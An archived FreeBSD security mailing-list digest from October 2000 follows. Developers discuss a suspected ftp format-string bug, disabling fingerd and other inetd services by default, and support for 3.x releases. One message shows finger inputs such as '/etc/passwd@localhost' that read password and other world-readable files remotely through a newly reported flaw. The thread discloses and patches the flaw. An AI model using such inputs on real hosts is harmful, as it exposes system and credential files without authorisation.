harmony.village.org (8.9.3/8.8.3) with ESMTP id RAA15790; Mon, 2 Oct 2000 17:31:42 -0600 (MDT) Message-Id: <200010022331.RAA15790@harmony.village.org> To: Robert Watson Subject: Re: ftpd bug in FreeBSD through at least 3.4 Cc: Nate Williams , Poul-Henning Kamp , James Wyatt , Brett Glass , "Chris D . Faulhaber" , security@FreeBSD.ORG, asmodai@FreeBSD.ORG In-reply-to: Your message of "Mon, 02 Oct 2000 17:10:49 EDT." References: Date: Mon, 02 Oct 2000 17:31:42 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Robert Watson writes: : I think it is too early to write off 3-STABLE as there is a huge install : base for the branch, and many products based on it. We don't even have a : native Netscape build for 4-STABLE yet :-). I think it is fine to assert : that no new feature development is occuring there, however. According to the security officer's long standing policy, we don't commit to support the old stale branch after we've had two releases on the new stable branch. This doesn't mean that we prevent people from contributing to it, just that we don't have resources to do so. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 16:43:27 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 96AE537B503; Mon, 2 Oct 2000 16:43:23 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id RAA11320; Mon, 2 Oct 2000 17:43:17 -0600 (MDT) Message-Id: <4.3.2.7.2.20001002173916.046c16f0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 02 Oct 2000 17:43:10 -0600 To: Kris Kennaway From: Brett Glass Subject: Re: ftpd bug in FreeBSD through at least 3.4 Cc: Alex Charalabidis , "Chris D . Faulhaber" , security@FreeBSD.org In-Reply-To: <20001002143917.B22329@freefall.freebsd.org> References: <4.3.2.7.2.20001002125825.00de8f00@localhost> <4.3.2.7.2.20001002123113.049344d0@localhost> <4.3.2.7.2.20001002125825.00de8f00@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 03:39 PM 10/2/2000, Kris Kennaway wrote: >No, I think your client is expanding the %s locally and sending the >junk to the server. Kris: I think you may be right here! The client may also be expanding the %s on the way BACK from the server. If this is the case, it is more serious because it means that a malicious server might be able to take over the client. I am checking to see if there are holes in the server, too. So far, when I send the same strings to the server using good ol' Telnet the server seems to respond pretty much correctly. There are still some minor server glitches: Some error messages are sent twice instead of once, the command is always changed to all uppercase up to the first whitespace and then echoed back with this modification, and trailing whitespace at the ends of commands is not ignored. But while these things could use fixing, none of them are exploitable. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 17: 1: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (placeholder-dcat-1076843290.broadbandoffice.net [64.47.83.26]) by hub.freebsd.org (Postfix) with ESMTP id 6E78237B502 for ; Mon, 2 Oct 2000 17:01:06 -0700 (PDT) Received: (from dillon@localhost) by earth.backplane.com (8.11.0/8.9.3) id e9300o311655; Mon, 2 Oct 2000 17:00:50 -0700 (PDT) (envelope-from dillon) Date: Mon, 2 Oct 2000 17:00:50 -0700 (PDT) From: Matt Dillon Message-Id: <200010030000.e9300o311655@earth.backplane.com> To: Garance A Drosihn Cc: freebsd-security@FreeBSD.ORG Subject: Re: Proposed minor mod to openssh for interactive operation References: <200009300023.e8U0NUW20137@earth.backplane.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :> two programs interactively. :> That is, send command, wait response, send command, wait :> response. Delaying packets is a bad idea and cuts :> performance over the link by about 20%. : :Would it be more appropriate to use stunnel (in ports) instead :of an ssh connection for your application? : :(I'm just wondering...) :--- :Garance Alistair Drosehn = gad@eclipse.acs.rpi.edu No, ssh provides the authentication mechanism as well as the secure link trivially. Besides, both rsh and ssh were designed for two-way operation so presumably they should actually do it in a reasonably optimal manner when two-way operation is requested. -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 17:21:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 3774C37B66C; Mon, 2 Oct 2000 17:21:34 -0700 (PDT) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e930LY006073; Mon, 2 Oct 2000 17:21:34 -0700 (PDT) Date: Mon, 2 Oct 2000 17:21:33 -0700 From: Alfred Perlstein To: "Jordan K. Hubbard" Cc: security@FreeBSD.org Subject: Re: cvs commit: src/etc inetd.conf Message-ID: <20001002172133.B27736@fw.wintelcom.net> References: <200010030008.RAA18074@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <200010030008.RAA18074@freefall.freebsd.org>; from jkh@FreeBSD.org on Mon, Oct 02, 2000 at 05:08:16PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Jordan K. Hubbard [001002 17:08] wrote: > jkh 2000/10/02 17:08:16 PDT > > Modified files: > etc inetd.conf > Log: > Turn fingerd OFF by default. Comparative essentials like telnetd > are bad enough, but finger is hardly a critical system service and > it's traditionally been vulnerable to a variety of attacks; anybody > remember RTFM and his worm? Can we please loose everything but telnet and ftp? This getting silly, your average user nowadays is less likely to know what rsh, rlogin, comsat and ntalk are then to have an actual need for them. And yes I also just had a mad scramble because I could have sworn that finger was off by default, luckily it seems that I'd either killed inetd or commented it out on all my hosts already. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 17:26:59 2000 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id B96F237B502 for ; Mon, 2 Oct 2000 17:26:57 -0700 (PDT) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id e930QOK06251; Mon, 2 Oct 2000 17:26:24 -0700 (PDT) Date: Mon, 2 Oct 2000 17:26:24 -0700 From: Alfred Perlstein To: Jordan Hubbard Cc: Warner Losh , Brian Somers , security@freebsd.org Subject: Re: cvs commit: src/usr.bin/finger finger.c Message-ID: <20001002172624.C27736@fw.wintelcom.net> References: <78462.970531991@winston.osd.bsdi.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: <78462.970531991@winston.osd.bsdi.com>; from jkh@winston.osd.bsdi.com on Mon, Oct 02, 2000 at 05:13:11PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Jordan Hubbard [001002 17:16] wrote: > > It is?!? Holy crap it IS - when did THAT happen? Somebody was > > And just to follow up to myself, I see by the logs that it's been on > for a very long time if not the very beginning. As I just said on > security, I guess I've been turning it off practically in my sleep > since it's not enabled on any of my systems and I don't even remember > disabling it. Since fingerd is hardly an essential service, I'm > hoping that few will argue with my recent decision to comment it out > by default. It's not like people will suddenly lose access to newly > installed systems (from Windows or some other no-ssh-by-default > environment), as was argued to be the case with telnetd. I've also found rather painfully that your smarter script kiddies will gleefully use your finger info to figure out where your DSL line is and happily smurf you to death. Or sometimes they'll just use it to fire up talk to you on your home machine which is good for a near heart attack. So can we turn this junk off? There should be no reason for a "securing FreeBSD" article to be posted somewhere. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 17:28:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id A213F37B502 for ; Mon, 2 Oct 2000 17:28:13 -0700 (PDT) Received: from bsdie.rwsystems.net([209.197.223.2]) (1158 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Mon, 2 Oct 2000 19:13:17 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Mon, 2 Oct 2000 19:13:16 -0500 (CDT) From: James Wyatt To: Jordan Hubbard Cc: Poul-Henning Kamp , Brett Glass , "Chris D . Faulhaber" , security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: <72365.970526437@winston.osd.bsdi.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 2 Oct 2000, Jordan Hubbard wrote: > > Then why is Walnut Creek CDROM still selling it as a current product? > > Because Walnut Creek CDROM (aka BSDI) still supports it. We don't > expect the project to do that for free, of course. Ah, Thank you for the distinction. I'm not sure I agree, but who cares about that? I'll be getting the new ROMs soon, but I can hope until then. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 17:28:31 2000 Delivered-To: freebsd-security@freebsd.org Received: from epsilon.lucida.qc.ca (epsilon.lucida.qc.ca [216.95.146.6]) by hub.freebsd.org (Postfix) with SMTP id 6E6A937B503 for ; Mon, 2 Oct 2000 17:28:28 -0700 (PDT) Received: (qmail 64153 invoked by uid 1000); 3 Oct 2000 00:28:27 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 3 Oct 2000 00:28:27 -0000 Date: Mon, 2 Oct 2000 20:28:25 -0400 (EDT) From: Matt Heckaman X-Sender: matt@epsilon.lucida.qc.ca To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: ftpd bug in FreeBSD through at least 3.4 In-Reply-To: <4.3.2.7.2.20001002124607.00df8150@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost 1.6.2 0/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Mon, 2 Oct 2000, Brett Glass wrote: : People are still running it 3.x, though. LOTS of people. Yep, not everyone can afford the downtime involved upgrading to 4.x. I know I still have a 3.5-STABLE machine for exactly that reason. I suppose one day I'll piss everyone off for a day and upgrade it, but until then... 3.{4,5} should NOT be dead, it has not been that long. : --Brett * Matt Heckaman - mailto:matt@lucida.qc.ca http://www.lucida.qc.ca/ * * GPG fingerprint - A9BC F3A8 278E 22F2 9BDA BFCF 74C3 2D31 C035 5390 * -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.3 (FreeBSD) Comment: http://www.lucida.qc.ca/pgp iD8DBQE52SgrdMMtMcA1U5ARAsd5AKDVeeliOidgFYrTsHUJWKWIrAUPTACgxz9E 0BO7q0vyS+vncM+xtS8CCIk= =PXez -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 17:40:32 2000 Delivered-To: freebsd-security@freebsd.org Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id A44E237B66C; Mon, 2 Oct 2000 17:40:23 -0700 (PDT) Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.0/8.9.3) with ESMTP id e930dTU78693; Mon, 2 Oct 2000 17:39:35 -0700 (PDT) (envelope-from jkh@winston.osd.bsdi.com) To: Alfred Perlstein Cc: "Jordan K. Hubbard" , security@FreeBSD.org Subject: Re: cvs commit: src/etc inetd.conf In-Reply-To: Message from Alfred Perlstein of "Mon, 02 Oct 2000 17:21:33 PDT." <20001002172133.B27736@fw.wintelcom.net> Date: Mon, 02 Oct 2000 17:39:27 -0700 Message-ID: <78689.970533567@winston.osd.bsdi.com> From: Jordan Hubbard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Can we please loose everything but telnet and ftp? This getting That wouldn't bother me at all. I'd even say lose ftp, but sysinstall asks about it right now and we'd have to disable that functionality or teach sysinstall about grubbing in inetd.conf files before it would be a truly practical suggestion. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 17:58:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from pebkac.owp.csus.edu (pebkac.owp.csus.edu [130.86.232.245]) by hub.freebsd.org (Postfix) with ESMTP id 3B12237B503; Mon, 2 Oct 2000 17:58:33 -0700 (PDT) Received: from owp.csus.edu (qbqjyl@[130.86.77.19]) by pebkac.owp.csus.edu (8.9.3/8.9.3) with ESMTP id RAA60378; Mon, 2 Oct 2000 17:58:33 -0700 (PDT) (envelope-from joseph.scott@owp.csus.edu) Message-ID: <39D92E08.E00CF2E4@owp.csus.edu> Date: Mon, 02 Oct 2000 17:53:28 -0700 From: Joseph Scott X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en,pdf MIME-Version: 1.0 To: Brian Somers Cc: cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: cvs commit: src/usr.bin/finger finger.c References: <200010022227.PAA62603@freefall.freebsd.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Brian Somers wrote: > > brian 2000/10/02 15:27:34 PDT > > Modified files: > usr.bin/finger finger.c > Log: > Don't allow finger /somefile, only allow filname expansions from > inside /etc/finger.conf This is one of those things that makes me go ack! So I started trying on a couple of my machines here. I tried it first against my own notebook running 4.1. It worked just as expected when run up against /etc/passwd@localhost. It did not work against a 3.4 machine from notebook though. I haven't looked to much closer at that part, but it seems to point to this "feature" being added somewhere between Jan 27 and Sep 14 (about the last world builds for these two machines). Another thing I've noticed, it looks like it only works against world readable files. So some couldn't do a finger /etc/master.passwd@goodguysrus.com and expect something back. There are of course plenty of world readable files on a system that I wouldn't really want everyone and their fish to look at :-( I'm not a fan of finger in general, turning off inetd entirely is part of a normal install for me. -- Joseph Scott joseph.scott@owp.csus.edu The Office Of Water Programs - CSU Sacramento To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 18: 0: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 1EB6437B671 for ; Mon, 2 Oct 2000 17:59:56 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id SAA11939; Mon, 2 Oct 2000 18:59:12 -0600 (MDT) Message-Id: <4.3.2.7.2.20001002185439.044cff00@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 02 Oct 2000 18:59:08 -0600 To: Jordan Hubbard , Alfred Perlstein From: Brett Glass Subject: Re: cvs commit: src/etc inetd.conf Cc: security@FreeBSD.ORG In-Reply-To: <78689.970533567@winston.osd.bsdi.com> References: <20001002172133.B27736@fw.wintelcom.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org My personal preference would be to lose telnet and ftp too (or at least offer this as an option) and enable sshd (which gives you ssh and scp instead). Since I realise that not everyone would want this, there should be an alternative inetd.conf that's more insecure by default. (The user should be warned that he's enabling protocols with plaintext passwords.) I just reviewed the three options in 4.1.1, and I think that they are a good start. However, there's not enough information about what they do! It'd be nice to see more detail (perhaps by hitting F1 for help). As for munging inetd.conf: It'd be nice, but offering several alternative files and switching between them would be fine. So would doing a "cat" of hunks of the file to assemble it; minimal intelligence is needed for this. --Brett At 06:39 PM 10/2/2000, Jordan Hubbard wrote: >> Can we please loose everything but telnet and ftp? This getting > >That wouldn't bother me at all. I'd even say lose ftp, but sysinstall >asks about it right now and we'd have to disable that functionality or >teach sysinstall about grubbing in inetd.conf files before it would be >a truly practical suggestion. > >- Jordan > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 18: 1:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from delivery.insweb.com (delivery.insweb.com [12.16.212.64]) by hub.freebsd.org (Postfix) with ESMTP id AD6CB37B503 for ; Mon, 2 Oct 2000 18:01:12 -0700 (PDT) Received: from ursine.com (dhcp4-202.secure.insweb.com [192.168.4.202]) by delivery.insweb.com (8.9.2/8.9.3) with ESMTP id SAA34221 for ; Mon, 2 Oct 2000 18:01:07 -0700 (PDT) (envelope-from fbsd-security@ursine.com) Message-ID: <39D93044.8B0C4E69@ursine.com> Date: Mon, 02 Oct 2000 18:03:00 -0700 From: Michael Bryan X-Mailer: Mozilla 4.75 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf References: <200010030008.RAA18074@freefall.freebsd.org> <20001002172133.B27736@fw.wintelcom.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Alfred Perlstein wrote: > > And yes I also just had a mad scramble because I could have sworn that > finger was off by default, luckily it seems that I'd either killed > inetd or commented it out on all my hosts already. A command that I -always- execute on any freshly installed system, and from time to time when checking up on things: netstat -an If any port has a listener on it, as an admin you'd better know what that listener is and why it's needed, and make any setup changes as warranted. It really helps a lot when setting up a box to make sure I've really disabled all the services I intended to. (Usually everything off except ssh and maybe SMTP and/or DNS, depending on the purpose of the box.) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 18: 1:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from pebkac.owp.csus.edu (pebkac.owp.csus.edu [130.86.232.245]) by hub.freebsd.org (Postfix) with ESMTP id 3CE6637B503; Mon, 2 Oct 2000 18:01:39 -0700 (PDT) Received: from owp.csus.edu (idqfmh@[130.86.77.19]) by pebkac.owp.csus.edu (8.9.3/8.9.3) with ESMTP id SAA60430; Mon, 2 Oct 2000 18:01:11 -0700 (PDT) (envelope-from joseph.scott@owp.csus.edu) Message-ID: <39D92EA6.4F75881A@owp.csus.edu> Date: Mon, 02 Oct 2000 17:56:06 -0700 From: Joseph Scott X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en,pdf MIME-Version: 1.0 To: Jordan Hubbard Cc: Alfred Perlstein , "Jordan K. Hubbard" , security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf References: <78689.970533567@winston.osd.bsdi.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jordan Hubbard wrote: > > > Can we please loose everything but telnet and ftp? This getting > > That wouldn't bother me at all. I'd even say lose ftp, but sysinstall > asks about it right now and we'd have to disable that functionality or > teach sysinstall about grubbing in inetd.conf files before it would be > a truly practical suggestion. Another possible solution would be to remove the ftp line out of inetd entirely and run as a stand alone daemon. This would allow us to add the needed glue to /etc/defaults/rc.conf and /etc/rc.conf. Based on observations of sysinstall this wouldn't be too different from what we do with things like gateway_enable and the like. -- Joseph Scott joseph.scott@owp.csus.edu The Office Of Water Programs - CSU Sacramento To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 18: 3:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 915F837B502; Mon, 2 Oct 2000 18:03:03 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA46224; Mon, 2 Oct 2000 18:03:03 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Mon, 2 Oct 2000 18:03:03 -0700 From: Kris Kennaway To: Joseph Scott Cc: Brian Somers , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: cvs commit: src/usr.bin/finger finger.c Message-ID: <20001002180303.A40584@freefall.freebsd.org> References: <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <39D92E08.E00CF2E4@owp.csus.edu>; from joseph.scott@owp.csus.edu on Mon, Oct 02, 2000 at 05:53:28PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Oct 02, 2000 at 05:53:28PM -0700, Joseph Scott wrote: > but it seems to point to this "feature" being added somewhere between > Jan 27 and Sep 14 (about the last world builds for these two > machines). It was added just before 4.1.1, and since finger runs as user nobody it only allows reading those files. The annoying thing is that I still have this commit flagged in my cvs folder because it seemed potentially dangerous, but I never got to looking at it and I didnt notice it had been MFCed. Oh well, too late now - at least it was caught in relatively short order :-) Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 18:47:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from roble.com (roble.com [206.40.34.50]) by hub.freebsd.org (Postfix) with ESMTP id F09F437B502 for ; Mon, 2 Oct 2000 18:47:29 -0700 (PDT) Received: from roble2.roble.com (roble2.roble.com [206.40.34.52]) by roble.com with SMTP id SAA18244 for ; Mon, 2 Oct 2000 18:47:33 -0700 (PDT) Date: Mon, 2 Oct 2000 18:47:28 -0700 (PDT) From: Roger Marquis To: security@freebsd.org Subject: Re: ftpd bug in FreeBSD through at least 3.4 Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >OS revisions are a fact of life, but since 4v0 was just released in >April and took some time to get to 4v1 (never trust %d.0 releases), I >would have expected a bit more support. Sometimes CVS isn't the answer >- like the 2v2r8 release firewall one of my cheaper clients has. We are >going to put a 4v1r1 box in place of it, but usually replacement is a >pain. - Jy@ OS upgrades are far more difficult than patches, both in terms of downtime and in terms of backwards compatibility. Operating Systems like FreeBSD, lacking much in the way of backwards compatibility, must be babied through frequent upgrades with lots of skilled systems administration. This runs contrary to systems administration principle #2: work smarter not harder. Commercial Unix vendors like Sun, on the other hand, only need to be upgraded every few years thanks to their extensive patch support. Backwards compatibility is often maintained across several major revisions saving hundreds of hours of maintenance in some cases. We're still using some Sun binaries compiled 10 and 11 years ago! Think of how many times you've had to recompiled FreeBSD binaries in just the last couple of years. The 3.3 ftpd is barely months old much less years. Takes a lot of the "free" out of FreeBSD. See http://sunsolve.Sun.COM/pub-cgi/show.pl?target=patches/patch-access for Solaris' list of supported releases going back to 2.3 (1994). -- Roger Marquis Roble Systems Consulting http://www.roble.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 19:54: 0 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 330B037B503; Mon, 2 Oct 2000 19:53:58 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA08215; Mon, 2 Oct 2000 19:53:58 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Mon, 2 Oct 2000 19:53:58 -0700 From: Kris Kennaway To: Brett Glass Cc: Jordan Hubbard , Alfred Perlstein , security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf Message-ID: <20001002195357.B40584@freefall.freebsd.org> References: <20001002172133.B27736@fw.wintelcom.net> <78689.970533567@winston.osd.bsdi.com> <4.3.2.7.2.20001002185439.044cff00@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <4.3.2.7.2.20001002185439.044cff00@localhost>; from brett@lariat.org on Mon, Oct 02, 2000 at 06:59:08PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Oct 02, 2000 at 06:59:08PM -0600, Brett Glass wrote: > My personal preference would be to lose telnet and ftp too (or > at least offer this as an option) and enable sshd (which gives > you ssh and scp instead). Since I realise that not everyone sshd is already enabled out of the box, by default. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 20:15:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from bignet.ru (ns.bignet.ru [213.242.28.5]) by hub.freebsd.org (Postfix) with SMTP id B12B637B502 for ; Mon, 2 Oct 2000 20:15:37 -0700 (PDT) Received: (qmail 4622 invoked from network); 3 Oct 2000 03:09:58 -0000 Received: from morpheus.bignet.ru (HELO 213.242.29.34) (213.242.29.34) by ns.bignet.ru with SMTP; 3 Oct 2000 03:09:58 -0000 Date: Tue, 3 Oct 2000 07:17:23 +0400 From: Blackman X-Mailer: The Bat! (v1.44) Reply-To: Blackman X-Priority: 3 (Normal) Message-ID: <12556850256.20001003071723@bignet.ru> To: freebsd-security@FreeBSD.ORG Subject: Kernel trap after showmount -a within a jail Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! Subj% Have a real system, NFS on it and jail. Kernel trap after 'showmount -a' started from unpriveleged user... How to resolve this problem?... Thanks. P.S> One more problem: how to prevent the 'df' command from users, P.S> that allow them to see "real" things on the system? --- Best regards, Blackman mailto:blackman@bignet.ru Security Officer ---"I'm peace man"--- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 21:26:59 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 5813B37B502; Mon, 2 Oct 2000 21:26:55 -0700 (PDT) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id WAA16322; Mon, 2 Oct 2000 22:26:51 -0600 (MDT) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id WAA21046; Mon, 2 Oct 2000 22:26:50 -0600 (MDT) (envelope-from nate) Date: Mon, 2 Oct 2000 22:26:50 -0600 (MDT) Message-Id: <200010030426.WAA21046@nomad.yogotech.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Jordan Hubbard Cc: Alfred Perlstein , "Jordan K. Hubbard" , security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf In-Reply-To: <78689.970533567@winston.osd.bsdi.com> References: <20001002172133.B27736@fw.wintelcom.net> <78689.970533567@winston.osd.bsdi.com> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Can we please loose everything but telnet and ftp? This getting > > That wouldn't bother me at all. I think the 'internal' auth should be on as well, since sendmail (for silly reasons) likes it on, and the internal version is silly enough to keep sendmail happy. Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 2 21:36:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id F114437B503 for ; Mon, 2 Oct 2000 21:36:11 -0700 (PDT) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id WAA16491; Mon, 2 Oct 2000 22:36:11 -0600 (MDT) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id WAA21079; Mon, 2 Oct 2000 22:36:10 -0600 (MDT) (envelope-from nate) Date: Mon, 2 Oct 2000 22:36:10 -0600 (MDT) Message-Id: <200010030436.WAA21079@nomad.yogotech.com> From: Nate Williams MIME-Version: 1.0 